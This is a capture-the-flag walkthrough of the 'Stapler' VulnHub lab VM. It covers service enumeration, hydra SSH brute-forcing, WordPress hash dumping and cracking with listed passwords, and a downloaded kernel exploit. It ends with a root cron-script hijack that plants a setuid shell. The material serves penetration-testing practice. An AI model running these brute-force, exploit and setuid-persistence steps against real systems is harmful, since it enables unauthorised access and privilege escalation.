CTF – Stapler

A beginner/intermediate VM, with only a few twists by author g0tmi1k. Apparently 2 ways to get limited shell and 3 ways to get root.

My Setup

For this VM I changed my lab to include a firewall. To act as a DHCP server, restrict traffic onto my home network and to the internet. Note had to turn the web filter off for updates to work.

Stapler https://www.vulnhub.com/entry/stapler-1,150/

UTM (free download) https://www.sophos.com/en/products/free-tools/sophos-utm-home-edition.aspx

My Hints

My Solution

A quick scan (nmap -Pn -T4 192.168.0.103) finds a few ports to start enumerating while a full scan runs. The full scan finds one extra port open.

nmap -Pn -T4 -A -p21,22,53,80,139,666,3306,12380 192.168.0.103

TCP 20/21 – FTP

First off ftp client was not installed so installed. Nmap finds anonymous login is allowed and a banner. Once in a  few user names are found (which are added to a users.txt file. Also find  a note. Uploading files with put appears a no go.

Assuming next steps would be brute force using the names found so far. Elly’s account sounds like there is something in there. Tried a few common passwords manually first (elly, password, elly1) then went straight to rockyou which took too long. Eventually came back to this and mutated elly’s name.

Logging in with these credentials via ftp showed the /etc folder was mapped here. A few observations:

Trying to find the version by checking /etc/issue we find a stapler image – lovely, but does not help.

Checking /etc/group we find user “peter” is a potential super user who is in the “sudo” group and also has a zsh login shell. Also other users with limited shell access.

TCP 22- SSH

An attempt to logon as John so we can see the banner. ssh enumeration scripts, were hit and miss. No obvious exploits found on the version.

TCP 53 – DOMAIN

Can’t find much here with telnet. Searchsploit mainly has dos. Tried host lookup, and zone transfer.

TCP 80 – HTTP

Appears a basic php cli server is running.

gobuster only finds 2 files which hint it may be someones home directory? also found .bash_logout with a unix dot file wordlist. Tried other common home directory files (anaconda-ks.cfg, .config, .login, .cshrc, .plan, .project, .bash_profile, .rhosts, .zshrc, .ssh/identity.pub, .ssh/id_dsa.pub, .bash_login, .bash_history) but no luck.

Note: post enumeration found this was only pointing to the home dir or user www, hence only 3 files being found.

Nikto also found nothing interesting. Even increasing the error limit to 100 int the config file found nothing more.

TCP 139 – NETBIOS

running enum4linux -a 192.168.0.103 finds a jackpot of information – open shares and a list of users. starting with the users, below is put into our with cut -d’\’ -f2 userlist.txt | cut -d’ ‘ -f1 | sort -u (to just give the username)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

Two shares are also found, which look interesting.

the below files are downloaded for further review.

Nothing too useful in vsftpd.conf. Confirms the FTP dir is /etc. WordPress backup does not contain the wp-config.

There is a file called “ls” which appears to be a temp file, not to sure what this is hinting at yet.

While here I also check if this folder is writable to, and sure enough it is. This could come in handy for later.

TCP 666 – DOOM / UNKNOWN?

appears to be an image being outputted? Saving with nc -v -w 2 192.168.0.103 666 > message2.jpg gets us a file. But its all gibberish when opened.

Further inspection with file, shows its a zip archive. When unzipped produces an actual jpeg file.

Opening the message2.jpeg shows a possible hint to a bof?

Examining inside the file and its metadata. There are no hidden files, but possibly a hint around cookie.

Post enumeration finds a user scott with the password cookie, which may be what it was hinting at.

TCP 3306 – MYSQL

no exploits found for this version. Tried logging in with default credentials and best guesses. mysql -uroot -p -h 192.168.0.103.

TCP 12380- HTTP and HTTPS

Apache appears to be running on both HTTP and HTTPS

A hidden message for zoe is found in the page comments.

admin112233 appears to be a rabbit hole.

WORDPRESS

https://192.168.0.103:12380/blogblog/ appears to be a WordPress site.

Running wpscan –url https://192.168.0.103:12380/blogblog/ –disable-tls-checks reveals some suggestions and exploits.

[+] WordPress version 4.2.1 identified.

Logging in a elly:ylle (password we found in FTP) lets us in but as a limited user.

One of the posts “WEEK2” mentions Pam’s birthday is today. When checking the published date, its May 20th, maybe a password hint? Sure enough after a few combinations around this date a valid login is found pam:0520 – however just another limited wp login.

To see what other possible user logins there are a scan is done, based off the usernames found so far

use auxiliary/scanner/http/wordpress_login_enum
set RHOSTS 192.168.0.103
set RPORT 12380
set SSL true
set TARGETURI /blogblog
set USER_FILE /root/Documents/stapler/users.txt
exploit
<snip>
[+] /blogblog - WordPress User-Validation - Username: 'harry' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'john' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'barry' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'kathy' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'scott' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'pam' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'dave' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'elly' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'peter' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'zoe' - is VALID
[+] /blogblog - WordPress User-Validation - Username: 'tim' - is VALID

PHPMYADMIN

A phpmyadmin page is also found at https://192.168.0.103:12380/phpmyadmin/index.php. No credentials found so far get us in, so will come back to this.

ATTACKING – INITIAL SHELL

From what has been found already, our next steps are below, prioritized in the order to action.

  1. Bruteforce ssh logins with found usernames?
  2. Bruteforce wordpress logins / dig through the wpscan suggestions / upload shell as plugin?
  3. Bruteforce mysql/phpadmin logins then try as ssh?
  4. Enumerate further on elly’s ftp access of /etc

Bruteforce SSH logins

Starting with SSH first, we throw a top100 wordlist with the users found so far.

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top100.txt -t 1 -W 3 192.168.0.103 ssh -e nsr

Note the -e nsr parameter is always very handy to amend to a hydra scan. This will try a null/no password (n), the username as the password (s) and the login name reversed (r)

Logging in as drew, we enumerate some more.

[email protected]:/home$ ps -ef

root 1436 1 0 Oct06 ? 00:00:00 su -c authbind php -S 0.0.0.0:80 -t /home/www/ &>/dev/null www

[email protected]:/var/www/https/announcements$ cat message.txt
Abby, we need to link the folder somewhere! Hidden at the mo

Also find the wordpress config file with the credentials root:plbkac – ha nice password ; )

phpMyAdmin is successfully logged into and wordpress hashes are dumped into a files and broken offline with hashcat64.exe -a 0 -m 400 stapler.txt rockyou.txt

1 	John 	$P$B7889EMq/erHIuZapMB8GEizebcIy9. //incorrect
2 	Elly 	$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 //ylle
3 	Peter 	$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
4 	barry 	$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 //washere
5 	heather $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 //passphrase
6 	garry 	$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 //football
7 	harry 	$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 //monkey
8 	scott 	$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 //cookie
9 	kathy 	$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 //coolgirl
10 	tim 	$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 //thumb
11 	ZOE 	$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 //partyqueen
12 	Dave 	$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. //damachine
13 	Simon 	$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
14 	Abby 	$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
15 	Vicki 	$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
16 	Pam 	$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 //0520

Also find a hint for Vicki

Assuming ID 1 / John will be the admin, we try logging in as him with great success. Also find John, Peter and Vicki are also admins.

There is also a icon on the side for AVE Video Search, checking the plugins finds this is version 1.0. Running past searchsploit finds this is vulnerable (39646.py). Appears another path to remotely view  wp-config.php (as we already have this, no need to investigate further).

Privilege Escalation

Apparently there are 3 ways to get root. I start with basic pe checks which turn up nothing obvious. Then look into my next options, prioritie based on chance of success, then jump into it.

  1. TCP 25 and 8888, that were not accessible remotely. Can these be exploited locally?
  2. maybe the hint found in the zip message, scott / echo seg fault / bof?
  3. maybe explore the hint found in smb “systemd-private”?
  4. (last resort) Kernel exploits?

Path1 – Investigate TCP 25 and 8888

When checking listing services two additional ports are found. 8888 is listening on all address, and 25 only on local host.

when checking out the running processes, 8888 is found to be associated with a SimpleHTTPServer and user JKanode.

When checking out their home directory, there is nothing obvious inside. But when manually checking the hidden dot files, .bash_history has some interesting entries.

A quick search for other user folders, finds nothing else interesting

logging in as JKanode:thisismypassword doesn’t seem to work, but peter:JZQuyIN5 does. We get prompted with some Z shell specific options, selecting (2). From previous enumeration we already know peter is in the sudo group and sure enough he has ALL:ALL access

Knowing this, a simple sudo commnad gets us to root! 1 of 3 pe paths found

Path 2- Kernel exploits

To see if a kernel exploit is another path, the OS and kernel versions are found.

These are then used in searchsploit. This returns a few exploits that exactly matches OS and kernel versions. While both look perfect and compile ok, I couldn’t get any of these to work. However when widening the search, eventually found one that worked a treat.

searchsploit "Ubuntu 16.04 4.4.0-21" | grep local // initial specific search

searchsploit "Ubuntu 16. 4.4." | grep local // broader search

https://www.exploit-db.com/exploits/39772/ 

wget http://192.168.0.102/stapler/exploit.tar
tar -xvf exploit.tar 
chmod +x compile.sh
./compile.sh
chmod +x doubleput
./doubleput

Path3 – Cronjob

While I was able to find the first 2, this one I admit completely overlooked during post enumeration.

Check all cron locations with ls -alh /etc/*cron* and in there we find “logrotate”. When investigated further, this is running every 5 minutes and executing /usr/local/sbin/cron-logrotate.sh as root. This is also wirtable.

To help locate any world writable files you can use find / -xdev -type f \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null , (changing the type to f for files or d for directories) this is listed in g0tmi1k Linux Privilege Escalation guide

Now all we do is modify this file, so that when it runs as root it does something malicious for us.

One option is to setuid on a shell and copy it to a tmp dir for us to run.

vi cron-logrotate.sh

#copy a shell to temp called pe
cp /bin/bash /tmp/pe	

#add the setuid to the shell, allowing to exec as group owner (root)
chmod u+s /tmp/pe

#change file mode bits to root
chmod root:root /tmp/pe

Eventually the “pe” file appears. Note the “s” bit is set. Just running the binary dosen’t work, the -p switch is required (but could not find what that meant).

Other Alternative Solutions

I always love to check out how other approached it, after solving it myself. What they did differently, what I missed, better ways to solve the same problem etc.

Kanishka –  read the wp-config with 39646.py and fixed using “import ssl” and “ssl._create_default_https_context = ssl._create_unverified_context”. Also found all 3 priv esc methods – including the cronjob one (I missed).

Mrb3n –  had an initial shell upload via tftp (i missed), and another option for the cron job, sending a shell back.